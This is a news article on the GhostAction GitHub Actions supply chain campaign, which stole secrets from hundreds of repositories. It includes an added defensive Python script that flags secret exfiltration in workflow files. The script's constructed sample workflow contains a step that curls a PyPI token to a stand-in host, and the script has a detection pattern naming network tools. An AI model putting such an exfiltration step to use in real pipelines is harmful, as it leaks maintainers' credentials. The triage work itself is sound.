Hundreds of GitHub users and repositories have been hit by another supply chain attack, in which threat actors have already stolen more than 3000 secrets, according to GitGuardian.
The security vendor first noticed suspicious activity related to a GitHub repository associated with the FastUUID project on September 5.
A compromised maintainer had pushed a malicious commit three days earlier. This contained a GitHub Actions workflow file designed to steal secrets, specifically a PyPI token.
“While this token should have allowed the actor to compromise the FastUUID package on PyPI, we found no evidence of malicious package releases during the compromise window,” GitGuardian explained.
“The attacker’s inaction during the three days following the initial compromise suggested FastUUID was not the primary target. Our investigation revealed a much larger operation.”
Digging deeper, the vendor discovered hundreds of similar malicious commits across multiple repositories, all tied back to the same compromised user and exfiltration endpoint. In total, it found that 327 users across 817 repositories had fallen victim to the campaign, leading to the exfiltration of 3325 secrets. GitGuardian dubbed this campaign “GhostAction.”
DockerHub credentials, GitHub tokens and npm tokens were the most common types of secret stolen in the campaign.
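The article describes the mechanism only at a high level: a workflow file committed to the repository reads secrets and sends them to an external endpoint. The script below is an added triage example, not GitGuardian's tooling or anything published by the affected projects. It walks the steps of a GitHub Actions workflow file and reports two things an incident responder wants after a commit like this: the list of secrets the workflow can reach (the rotation list) and any step that combines a secret reference with an outbound network command, plus any use of `toJSON(secrets)`, which serialises every repository secret at once. The sample workflow, the `cache.example.invalid` host and the secret name `PYPI_TOKEN` are constructed for the example; the YAML is handled with a small indentation-based walker so no third-party parser is required.

```python
"""Triage helper for GitHub Actions workflow files (added example, not GitGuardian's code).

Reports (1) every secret a workflow references, (2) steps that reference a secret
and also run an outbound network tool, and (3) use of toJSON(secrets).
"""
import re
from dataclasses import dataclass, field

SECRET_REF = re.compile(r"secrets\.([A-Za-z0-9_]+)")
DUMP_ALL = re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE)
NETWORK_CMD = re.compile(r"\b(curl|wget|ncat|socat|Invoke-WebRequest|Invoke-RestMethod)\b")


@dataclass
class Finding:
    kind: str    # "dump_all" or "secret_to_network"
    line: int    # 1-based line where the offending step (or line) starts
    detail: str


@dataclass
class Report:
    secrets: set = field(default_factory=set)      # names to rotate
    findings: list = field(default_factory=list)


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def _steps(lines):
    """Yield (start_line_no, step_text) for each list item under a `steps:` key.

    A step starts at a `- ` line at the indentation of the first item after `steps:`;
    everything indented deeper (run blocks, env, with) belongs to that step.
    """
    steps_indent = step_indent = cur_start = None
    cur = []
    for idx, line in enumerate(lines, 1):
        stripped, ind = line.strip(), _indent(line)
        if stripped == "":
            if cur:
                cur.append(line)
            continue
        if re.match(r"^\s*steps:\s*$", line):
            if cur:
                yield cur_start, "\n".join(cur)
                cur = []
            steps_indent, step_indent = ind, None
            continue
        if steps_indent is None:
            continue
        if ind <= steps_indent:                 # left the steps list (next job key)
            if cur:
                yield cur_start, "\n".join(cur)
                cur = []
            steps_indent = step_indent = None
            continue
        if stripped.startswith("-") and (step_indent is None or ind == step_indent):
            if cur:
                yield cur_start, "\n".join(cur)
            step_indent, cur_start, cur = ind, idx, [line]
        else:
            cur.append(line)
    if cur:
        yield cur_start, "\n".join(cur)


def scan_workflow(text: str) -> Report:
    """Scan one workflow file's text and return the rotation list and findings."""
    lines = text.splitlines()
    report = Report()
    report.secrets.update(SECRET_REF.findall(text))
    for lineno, line in enumerate(lines, 1):
        if DUMP_ALL.search(line):
            report.findings.append(Finding("dump_all", lineno, line.strip()))
    for start, step in _steps(lines):
        refs = set(SECRET_REF.findall(step))
        net = NETWORK_CMD.search(step)
        if refs and net:
            report.findings.append(
                Finding("secret_to_network", start, f"{net.group(1)} in a step using {sorted(refs)}"))
    return report


# Constructed sample: a normal publish step plus a step that posts the same token elsewhere.
SAMPLE_WORKFLOW = """\
name: release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: python -m build
      - name: Publish
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_TOKEN }}
      - name: Sync cache
        env:
          TOKEN: ${{ secrets.PYPI_TOKEN }}
        run: |
          curl -sS -X POST --data "$TOKEN" https://cache.example.invalid/sync
"""

if __name__ == "__main__":
    rep = scan_workflow(SAMPLE_WORKFLOW)
    print("rotate:", sorted(rep.secrets))
    for f in rep.findings:
        print(f"line {f.line}: {f.kind}: {f.detail}")
```

Run it over every file under `.github/workflows/` at the suspect commit and at the last known-good commit; the difference in `secrets` tells you what to rotate, and a `secret_to_network` or `dump_all` finding marks the step to revert. The legitimate publish step above references the same token but produces no finding, because the token goes to a `uses:` action rather than to a shell command that talks to the network.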
Remediation Efforts Kick In
GitGuardian was quick to inform the affected users. It claimed 100 of the impacted repositories had already reverted the malicious changes made by the threat actor, leaving hundreds more still at risk.
“This disclosure prompted rapid remediation efforts. Initial discussions with affected developers confirmed that attackers were actively exploiting the stolen secrets, including AWS access keys and database credentials,” it explained.
“Several companies were found to have their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript and Go repositories simultaneously.”
GitGuardian notified the GitHub, npm and PyPI security teams on September 5 about the campaign, warning that nine npm and 15 PyPI packages are “at risk of compromise in the next hours or days.”
The campaign is not thought to be connected to the recent “S1ngularity” attack campaign, with no crossover in victims.